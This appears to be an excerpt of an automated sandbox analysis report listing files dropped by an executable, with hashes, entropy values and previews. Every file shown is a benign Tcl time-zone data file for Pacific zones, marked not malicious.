                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Easter) {.. {-9223372036854775808 -26248 0 LMT}.. {-2524495352 -26248 0 EMT}.. {-1178124152 -25200 0 -07}.. {-36619200 -21600 1 -07}.. {-23922000 -25200 0 -07}.. {-3355200 -21600 1 -07}.. {7527600 -25200 0 -07}.. {24465600 -21600 1 -07}.. {37767600 -25200 0 -07}.. {55915200 -21600 1 -07}.. {69217200 -25200 0 -07}.. {87969600 -21600 1 -07}.. {100666800 -25200 0 -07}.. {118209600 -21600 1 -07}.. {132116400 -25200 0 -07}.. {150868800 -21600 1 -07}.. {163566000 -25200 0 -07}.. {182318400 -21600 1 -07}.. {195620400 -25200 0 -07}.. {213768000 -21600 1 -07}.. {227070000 -25200 0 -07}.. {245217600 -21600 1 -07}.. {258519600 -25200 0 -07}.. {277272000 -21600 1 -07}.. {289969200 -25200 0 -07}.. {308721600 -21600 1 -07}.. {321418800 -25200 0 -07}.. {340171200 -21600 1 -07}.. {353473200 -25200 0 -07}.. {371620800 -21600 1 -07}.. {384922800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):789
                                                                                                                                                                                                                              Entropy (8bit):4.0457106900970325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86HmdH6mvCON3Xj/kw2eX/xtDedjX24ots0FX2ud5KRGkpFxy:uegazZBzCdXUFQzy
                                                                                                                                                                                                                              MD5:6841B8A2FB9BBF464AA00088CBDCEC80
                                                                                                                                                                                                                              SHA1:26CC5CCE00A765F8B6493ED24F50957AA7F0089B
                                                                                                                                                                                                                              SHA-256:332372E5EFB46123FBB66F9F32F91B59EBD88ADB956249DB3F14CAAB01CE2655
                                                                                                                                                                                                                              SHA-512:A6C67A0F7361E599369597E9A8A52FC7D5C96DE6B5A7C1BE1D02F5DF11051F448289786C7F0E82E71CDEB825215E64E072CF034C45D6E2F822D7201AB8B41B57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Efate) {.. {-9223372036854775808 40396 0 LMT}.. {-1829387596 39600 0 +11}.. {125409600 43200 1 +11}.. {133876800 39600 0 +11}.. {433256400 43200 1 +11}.. {448977600 39600 0 +11}.. {464706000 43200 1 +11}.. {480427200 39600 0 +11}.. {496760400 43200 1 +11}.. {511876800 39600 0 +11}.. {528210000 43200 1 +11}.. {543931200 39600 0 +11}.. {559659600 43200 1 +11}.. {575380800 39600 0 +11}.. {591109200 43200 1 +11}.. {606830400 39600 0 +11}.. {622558800 43200 1 +11}.. {638280000 39600 0 +11}.. {654008400 43200 1 +11}.. {669729600 39600 0 +11}.. {686062800 43200 1 +11}.. {696340800 39600 0 +11}.. {719931600 43200 1 +11}.. {727790400 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.82787610497142
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG11avXHAIgObT11ORL/nUDH7/UDH11B:SlSWB9vsM3yckHAIgObON/h
                                                                                                                                                                                                                              MD5:CD1AC50AADC3CF9C0E7A055D587E790D
                                                                                                                                                                                                                              SHA1:BEE0E16D3954DF33C697DEA469A130BD9875AB8B
                                                                                                                                                                                                                              SHA-256:790E6B48B261D6DEF7D183CC8F38FB8D8A6E3EFB8844281EFABB2DFD621E53B5
                                                                                                                                                                                                                              SHA-512:B6A93DFB4CBE2F35268AACA88FDCC4D19949A2E8DC9464D8341C38065C6FF48A3C49FE756FFCE777C8F806DE309C8AFC4CE4BC4ABD183C28808F995A0F89B091
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Kanton)]} {.. LoadTimeZoneFile Pacific/Kanton..}..set TZData(:Pacific/Enderbury) $TZData(:Pacific/Kanton)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.913439535905759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDH4ErKYofMXGm2OH18VkeoHvmUENBBy/aCPFVFv7Dy:SlSWB9eg/BE3ofDm2OH1VeoHvmH7y/Fy
                                                                                                                                                                                                                              MD5:6250F332356787613A2D1853EF6D1AC3
                                                                                                                                                                                                                              SHA1:0464B9EE8B691990022295D2DEFE1AAE4B247E63
                                                                                                                                                                                                                              SHA-256:336058DCA4802C79ED43F6177ADB73085D4FA0754B94051CAE2A19346B0C4904
                                                                                                                                                                                                                              SHA-512:B8FAB5E128D2EF3CB7050DA717D80247045BE09F7F6542AA154CB85F4A56884F195EE2776421890A3F86D133106DCA4672D7D9329E0DE6F4A7CF8F4030822988
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Fakaofo) {.. {-9223372036854775808 -41096 0 LMT}.. {-2177411704 -39600 0 -11}.. {1325242800 46800 0 +13}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):986
                                                                                                                                                                                                                              Entropy (8bit):3.950865906618592
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CKeaEa+TkUqOL1X7dMUhSXUmxY8yiUKEMH0Mkxu:9pW15Mmk59NQMk0
                                                                                                                                                                                                                              MD5:E329ACBF859B35950B27F434D725B3F8
                                                                                                                                                                                                                              SHA1:9B46C4318CA0F03E016F8FF68FEE50EA93B22360
                                                                                                                                                                                                                              SHA-256:0FF7AF55C92806751473CBF7A55E860850719BA7255CD65FD630B99E05C7C177
                                                                                                                                                                                                                              SHA-512:84A7491E2C8A6866B40A3673C084ABF3F1E344CB0290C607A0BB06FF19D43EF0B9648CDA6489D10C410D39C700D8C62A8BA11EEF07AD36F5A9AD85C596205939
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Fiji) {.. {-9223372036854775808 42944 0 LMT}.. {-1709985344 43200 0 +12}.. {909842400 46800 1 +12}.. {920124000 43200 0 +12}.. {941896800 46800 1 +12}.. {951573600 43200 0 +12}.. {1259416800 46800 1 +12}.. {1269698400 43200 0 +12}.. {1287842400 46800 1 +12}.. {1299333600 43200 0 +12}.. {1319292000 46800 1 +12}.. {1327154400 43200 0 +12}.. {1350741600 46800 1 +12}.. {1358604000 43200 0 +12}.. {1382796000 46800 1 +12}.. {1390050000 43200 0 +12}.. {1414850400 46800 1 +12}.. {1421503200 43200 0 +12}.. {1446300000 46800 1 +12}.. {1452952800 43200 0 +12}.. {1478354400 46800 1 +12}.. {1484402400 43200 0 +12}.. {1509804000 46800 1 +12}.. {1515852000 43200 0 +12}.. {1541253600 46800 1 +12}.. {1547301600 43200 0 +12}.. {1573308000 46800 1 +12}.. {1578751200 43200 0 +12}.. {1608386400 46800 1 +12}.. {1610805600 43200 0 +12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.770127787944403
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDH4QwyFPUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/BCLNn
                                                                                                                                                                                                                              MD5:BBB00369FA8DCC23A7824EDB964BF48D
                                                                                                                                                                                                                              SHA1:A97E42B3CC45860CC0DFC62F468B24A628B43973
                                                                                                                                                                                                                              SHA-256:AFFB0A5D9CBD5949F2FC5047820FA2A2798F7C303F7BC972EC49CCF27837B00E
                                                                                                                                                                                                                              SHA-512:2D4C8616308522C987437C39C74E250973C2AC7AA1499C60321F42E84CE52C28D1F6AE81E6390B116C92C7B208EA0F211EB3C5A86E6E4CEE0620014DE5359F4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Funafuti) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):247
                                                                                                                                                                                                                              Entropy (8bit):4.687336389955113
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/fEGDm2OHvQYeoHTie7KVQRncRvinrN5/uFifriX:MB86fhmdH0CTV7OcdrN5/uFiGX
                                                                                                                                                                                                                              MD5:0557D164DCD8DF5D99F7AF5A2AB1AD4F
                                                                                                                                                                                                                              SHA1:68AFD04303E5F541480425405D82E1827F78A8DF
                                                                                                                                                                                                                              SHA-256:192545659F971084ADC8489A2B96A6439FF391599DC962AA13375ACCFB3C09D9
                                                                                                                                                                                                                              SHA-512:1DA004E51F8E7A712EDE920CBB62E81F9F55450FB52B62F78F1CD4F8F4E342B4DAB2C28AA5161E8B24942A7A5BD55F978AFDA1C5E1949241E71D738079DEF9B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Galapagos) {.. {-9223372036854775808 -21504 0 LMT}.. {-1230746496 -18000 0 -05}.. {504939600 -21600 0 -06}.. {722930400 -18000 1 -06}.. {728888400 -21600 0 -06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                              Entropy (8bit):4.976931060677737
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5hBYfMXGm2OHKToxYoHsdNfis:SlSWB9eg/DDm2OHPxYoH4qs
                                                                                                                                                                                                                              MD5:45330CE0FA604304C6ACF8EF8CAF51EC
                                                                                                                                                                                                                              SHA1:20EEF9646996C2EC9B2641EBCCBE4766BF38B17B
                                                                                                                                                                                                                              SHA-256:190E02A0C00D165FA45C73AEF9C0D6C82B1720E7406E5610DD860AED10A021A5
                                                                                                                                                                                                                              SHA-512:51C7931B503405DA0B4078F6BE411895DD00E86AC7C5BE475030664D5302AD614293541DEE7FFC3D86A9DDB1BDA32BCAA746CF1D207DB063FBA2F9E9BE12836C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Gambier) {.. {-9223372036854775808 -32388 0 LMT}.. {-1806678012 -32400 0 -09}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):157
                                                                                                                                                                                                                              Entropy (8bit):4.9796189407775255
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDH5RyJTLJ5FNMXGm2OHddHvpoxYoHsdMWdHPVtyn:SlSWB9eg/LJHjXDm2OHdFGxYoHgHPLy
                                                                                                                                                                                                                              MD5:DF09960360D8CEDCA2A4DC19A177C4A6
                                                                                                                                                                                                                              SHA1:9F73F271B8C85B25FE6392B8BF7465C92EFFE621
                                                                                                                                                                                                                              SHA-256:161762334DFF48B1D58824911E1FF4171386EA18234DD3DD5B0798515593086A
                                                                                                                                                                                                                              SHA-512:1BE9E0F90DA529C99E317F399BFDB913A076651CF8801A1849247B26A350A76D8B5807AB139F3DBB97790DDFC332BDBEB57B364BF67FA2BB440AFEDC4130A648
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guadalcanal) {.. {-9223372036854775808 38388 0 LMT}.. {-1806748788 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):733
                                                                                                                                                                                                                              Entropy (8bit):4.244282318063802
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862mdHanCTCtBCv1yWQkHHLTaWJ+x+87W0x+8+yWSi+JW7+sWU0dwaW1j+FaW2:FeaC2twvY3knLGs+I87p+8d9i+J7s70c
                                                                                                                                                                                                                              MD5:BA319E451BE323C852A8ABFC299DDA28
                                                                                                                                                                                                                              SHA1:FC9314C162FF1FE1ED5E2C5DF962A55D4D6D8115
                                                                                                                                                                                                                              SHA-256:42CB69ABC83415F63CA7D2A3E5314A41817AEE3206ECCC7172C50A74B1597DB0
                                                                                                                                                                                                                              SHA-512:3BF733B9ED2A57B01BE173A8421B2D5A45888A230461EA0BD8C5B4AC7DC010BB527346731196141C70AFECDF88DD47AFE48636243DFC395D88E58231BEDF7D2A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Guam) {.. {-9223372036854775808 -51660 0 LMT}.. {-3944626740 34740 0 LMT}.. {-2177487540 36000 0 GST}.. {-885549600 32400 0 +09}.. {-802256400 36000 0 GST}.. {-331891200 39600 1 GDT}.. {-281610000 36000 0 GST}.. {-73728000 39600 1 GDT}.. {-29415540 36000 0 GST}.. {-16704000 39600 1 GDT}.. {-10659600 36000 0 GST}.. {9907200 39600 1 GDT}.. {21394800 36000 0 GST}.. {41356800 39600 1 GDT}.. {52844400 36000 0 GST}.. {124819200 39600 1 GDT}.. {130863600 36000 0 GST}.. {201888000 39600 1 GDT}.. {209487660 36000 0 GST}.. {230659200 39600 1 GDT}.. {241542000 36000 0 GST}.. {977493600 36000 0 ChST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):344
                                                                                                                                                                                                                              Entropy (8bit):4.640604617840767
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/PeDDm2OHsVVoHvBrai3UNFv+rUXaWFvAHovj/0nvCv7p+v:MB86WXmdH0VCvBz0GOTA0/0y74v
                                                                                                                                                                                                                              MD5:F3F0E64655FAA79E40860765EEBB5B77
                                                                                                                                                                                                                              SHA1:7F6C2FC100AEABC26B7205AB53C1E016B12E4D60
                                                                                                                                                                                                                              SHA-256:69319015799D32D3CF7C0A3E9991B4B1F3E0C5D1B4FBF400517350CCA9D2C3B7
                                                                                                                                                                                                                              SHA-512:7C9238BCCB13B90D4DC9B5E776C421A42C25D21B4E026406F57FA1E70983E8F6BF1CE927AB9D0D6261C5C1802A8B810399F506915262F82F487417CFD704B2F1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Honolulu) {.. {-9223372036854775808 -37886 0 LMT}.. {-2334101314 -37800 0 HST}.. {-1157283000 -34200 1 HDT}.. {-1155436200 -34200 0 HST}.. {-880201800 -34200 1 HWT}.. {-769395600 -34200 1 HPT}.. {-765376200 -37800 0 HST}.. {-712150200 -36000 0 HST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):193
                                                                                                                                                                                                                              Entropy (8bit):4.844454917943834
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yc6e8SHAIgOb6eKAN/NWyVheo:MByMdniinbtNWzo
                                                                                                                                                                                                                              MD5:4244078A03C2493009EF2F6BDA2F326F
                                                                                                                                                                                                                              SHA1:AC2FF3E91A8831A479B33DF32A0118BC2EB255D0
                                                                                                                                                                                                                              SHA-256:6E52B361AC8A6A578C709F6D58AA7535F06C0CB1707081C2D5A63FA8545D955C
                                                                                                                                                                                                                              SHA-512:398B32E0FAF80E40DF3ACD203DF380D61DC39322F0BA0388A18281BC26973945F45683A104B9A785BB9DF5E514322F6994F934289E4B56B7982F94D4528D4272
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:Pacific/Johnston) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.669308556946547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/KyXDm2OHEMmzQwXy29BVyv7y/fTVVFty:MB86KyTmdHEZzQUBVyDy/fZvty
                                                                                                                                                                                                                              MD5:544A0A83241333805192A6F03888E359
                                                                                                                                                                                                                              SHA1:99D2BE79D57B44BD538386F9E7551C9E1874D7E3
                                                                                                                                                                                                                              SHA-256:0B1345555EC2B4738CC4DEBFE496C287966F238386263032FF1E27912CCBFBA6
                                                                                                                                                                                                                              SHA-512:61C91265632D01FBB7F4C739368756C428258FA6C141E49E88B6C78ABEA6150A74B8DFCF14C5AADDA03C1EA6F04D122734654495C26B8614561786B1C5C7EF10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kanton) {.. {-9223372036854775808 0 0 -00}.. {-1020470400 -43200 0 -12}.. {307627200 -39600 0 -11}.. {788871600 46800 0 +13}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.739672105601744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/iSDm2OHjkeoHvmLVFFz4YWXfSzvjNv:MB86iGmdHpCvU4VfSbxv
                                                                                                                                                                                                                              MD5:1B695BBB9C50F6AFC05F67DE30374160
                                                                                                                                                                                                                              SHA1:08AD8BBB6C99EB36FC3E462DB41C6896F52F150C
                                                                                                                                                                                                                              SHA-256:4F7235B956A5A01676BE05275E086D5157EBC24FD91022E87817020669F915F7
                                                                                                                                                                                                                              SHA-512:DC35CB1C2E5E035A82F91D1B1F4B48D7B112D9B7A1A7DB9C4A4C42C4D58002E1ECD9D24B2EA5B624DBB526ADDF9A8AB37D4315843207C34C16B2EFE33A254752
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kiritimati) {.. {-9223372036854775808 -37760 0 LMT}.. {-2177415040 -38400 0 -1040}.. {307622400 -36000 0 -10}.. {788868000 50400 0 +14}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):394
                                                                                                                                                                                                                              Entropy (8bit):4.441317927120857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB869nmdHlCTvrvCvKcHwzHHI/HKOjHHwZaLYkcy:2ecrrqvGznISknwZaLxcy
                                                                                                                                                                                                                              MD5:B489D7BDE8EB805B2A24726A6FB0C441
                                                                                                                                                                                                                              SHA1:7997A33AA56857EC52B1198DBEF4CE1DB50D69FD
                                                                                                                                                                                                                              SHA-256:B528E5E712E5F878603183E7CCFF55E5DB97CB47D7628BCB635342796317B899
                                                                                                                                                                                                                              SHA-512:4898AC2747FB8620BE29933CC7AA344AF1A3B7777D1AFF08BB4C6CE6E7AF205581937CCB488F3CB39CC8CA7FB42EDC8E1CAD8BADC9FCA40E3CAD23271CD66FCB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kosrae) {.. {-9223372036854775808 -47284 0 LMT}.. {-3944631116 39116 0 LMT}.. {-2177491916 39600 0 +11}.. {-1743678000 32400 0 +09}.. {-1606813200 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-770634000 39600 0 +11}.. {-7988400 43200 0 +12}.. {915105600 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):304
                                                                                                                                                                                                                              Entropy (8bit):4.5947337310364835
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/yEyDm2OH4T2eoHvmfKnOjvScHrkL/Xy2185k0YAov:MB86XmmdHWCv6KOjHHgLN8tby
                                                                                                                                                                                                                              MD5:7D1FC9913941693ACBD6A3CCB2F34555
                                                                                                                                                                                                                              SHA1:D07C8AAED1DF9614BCA6EEF0F72FB98BE46CF5EF
                                                                                                                                                                                                                              SHA-256:38133BE70100D7DC244A680827879E6B240646C7C0B68F58652051E681A71985
                                                                                                                                                                                                                              SHA-512:419F0A1D1D71C8F84765C7B54271D7EFD6A81F428751523A214ABB24A8770DD5A7666F634A20AF97D5AAB8F21C0DEF23DCDE068CF4C1CCC7639ABC43864A9DBC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Kwajalein) {.. {-9223372036854775808 40160 0 LMT}.. {-2177492960 39600 0 +11}.. {-1041418800 36000 0 +10}.. {-907408800 32400 0 +09}.. {-817462800 39600 0 +11}.. {-7988400 -43200 0 -12}.. {745934400 43200 0 +12}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.7986219497241995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHznHlUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/QxNn
                                                                                                                                                                                                                              MD5:EB409C340A475B60993965A0E2892B6E
                                                                                                                                                                                                                              SHA1:819881A078F34EF8FC55D71D829B82C56E6723D7
                                                                                                                                                                                                                              SHA-256:935BC00C13863715D09463E54DC2A6FF0F1A7EEA8D5895C87836AA59716CBD57
                                                                                                                                                                                                                              SHA-512:A28AF85022F8B3C2EE5F93BF6FDC0C349B73F25D88BA151ACE424EED1A95FA29608A6B1AD3D5FD952B2FB7F48DF6FDF8E6504F2B53E6782E4FF73335AF9A15C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Majuro) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.976348164850869
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/nUDHzrHeWNMXGm2OHOx5oHsdNpNFvvIVVFvYy:SlSWB9eg/cHeSDm2OHOnoH4/FvQVVFAy
                                                                                                                                                                                                                              MD5:80CB45F42BAB1AA72CD7C7BC394DF3F8
                                                                                                                                                                                                                              SHA1:8B5ED2BCCA1AEB41F22AFD14F46533959828B2BE
                                                                                                                                                                                                                              SHA-256:AE0B5055C6E57516F23749B13681205EAD376E682959716A457B1377AF8160BA
                                                                                                                                                                                                                              SHA-512:71562E340B7A96B91D04FCBCAF71B66EA725CA1BD1094343C4442F8F9A8C67A3BE378034849197407D21C3EE74E2C753B1FD3BAFF2378714B993AD9336236A0E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Marquesas) {.. {-9223372036854775808 -33480 0 LMT}.. {-1806676920 -34200 0 -0930}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.81307101485774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/nUDHz0HvUDHurKv:SlSWB9vsM3yciemHAIgObiecN/Zevn
                                                                                                                                                                                                                              MD5:13CE48F8FF74BFCEFCB8D217D6357E38
                                                                                                                                                                                                                              SHA1:296D31E3F868934C6EB34BF1BF4C23F3E1839294
                                                                                                                                                                                                                              SHA-256:F62C6A2DEC1E9EC78115D5F14E5B9DB7C86F788662D2E68F7E6714F4A05DC974
                                                                                                                                                                                                                              SHA-512:778813FC08EF803743F392000BECE73C1C079883DAFC26FAC0AF8FA3FA4AE1D94BA8F3CAA5E82DD4DB1A5F12AD49E123901908F5483E0E325952622AB4C4A26A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:Pacific/Midway) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.702705620563736
                                                                                                                                                                                                                              Encrypted:false
